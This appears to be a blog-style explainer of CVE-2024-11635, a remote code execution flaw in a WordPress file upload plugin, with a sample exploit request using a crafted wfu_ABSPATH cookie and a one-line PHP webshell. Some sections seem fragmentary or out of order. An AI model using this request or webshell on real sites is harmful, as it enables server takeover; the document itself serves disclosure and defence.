CVE-2024-11635 - Remote Code Execution in WordPress File Upload Plugin via wfu_ABSPATH Cookie

CVE-2024-11635 is a serious security vulnerability in the popular WordPress File Upload plugin, affecting all versions up to and including 4.24.12. Attackers can exploit this bug to run any code they want on your server—without needing to log in. Here is an exclusive, plain-language breakdown of what happened, how it works, and what you should do.

What Is the WordPress File Upload Plugin?

WordPress File Upload is a widely used plugin that lets visitors upload files to a WordPress website. It's installed on over 50,000 sites and is trusted for its simplicity.

What Is CVE-2024-11635?

CVE-2024-11635 is a Remote Code Execution (RCE) bug. This means an attacker can upload and execute dangerous files on your server. This risk applies if you’re using any version up to, and including, 4.24.12. The bug relates to a cookie parameter called wfu_ABSPATH—which should have never been user-controllable.

How Does the Vulnerability Work?

The plugin reads the value of the cookie named wfu_ABSPATH in some of its file-handling code. It uses this value as an absolute file path—without enough security checks. That means anyone can set this cookie to *any* path on the server. Worse, the plugin just includes files from the user-provided path, letting an attacker execute their own PHP code.

Why Is This so Bad?

This is a classic example of an arbitrary file inclusion vulnerability. By sending a malicious request with a crafted cookie, the attacker can trick WordPress into running their malicious PHP code.

Example Exploit

> Warning: This information is provided for educational and defensive purposes only.

Let’s walk through how an attacker might use this vulnerability. Suppose they craft a malicious PHP script and use another vulnerability (or open file upload feature) to place it somewhere on the web server, such as /tmp/shell.php.

The attacker would then send an HTTP request to the vulnerable site—*no login required*—like this:

GET /wp-content/plugins/wordpress-file-upload/wordpress_file_upload.php HTTP/1.1
Host: victim.com
Cookie: wfu_ABSPATH=/tmp/shell.php

What happens?
The plugin’s code reads the cookie and tries to include /tmp/shell.php, executing whatever PHP code is inside that file—now running as the web server!

A simple webshell could be as short as

<?php system($_GET['cmd']); ?>

The attacker uploads this as /tmp/shell.php and then browses to

http://victim.com/wp-content/plugins/wordpress-file-upload/wordpress_file_upload.php?cmd=whoami

While the actual vulnerable code may be more complex, it works roughly like this (simplified)

if (isset($_COOKIE['wfu_ABSPATH'])) {
    $abspath = $_COOKIE['wfu_ABSPATH'];
    include($abspath); // Danger: user input controls file included
}

Sites that allow file uploads or have another way for an attacker to drop files

Note: This attack does *not* require a WordPress user account.

References and Further Reading

- Wordfence Advisory and Technical Details
- NIST National Vulnerability Database: CVE-2024-11635
- Original Plugin Download / Changelog

2. Check your server for suspicious files

- Look in /tmp/, /uploads/, or any writable directories for unknown .php files.

Conclusion

CVE-2024-11635 is a critical bug affecting a hugely popular WordPress plugin. It allows anyone to execute code on your server, potentially compromising your entire website. The vulnerability is easy to exploit and should be addressed by updating immediately. Stay secure!


*For more details about WordPress security, consider regular reviews of your plugin inventory and always keep up with responsible vulnerability disclosures.*

Timeline

Published on: 01/08/2025 08:15:24 UTC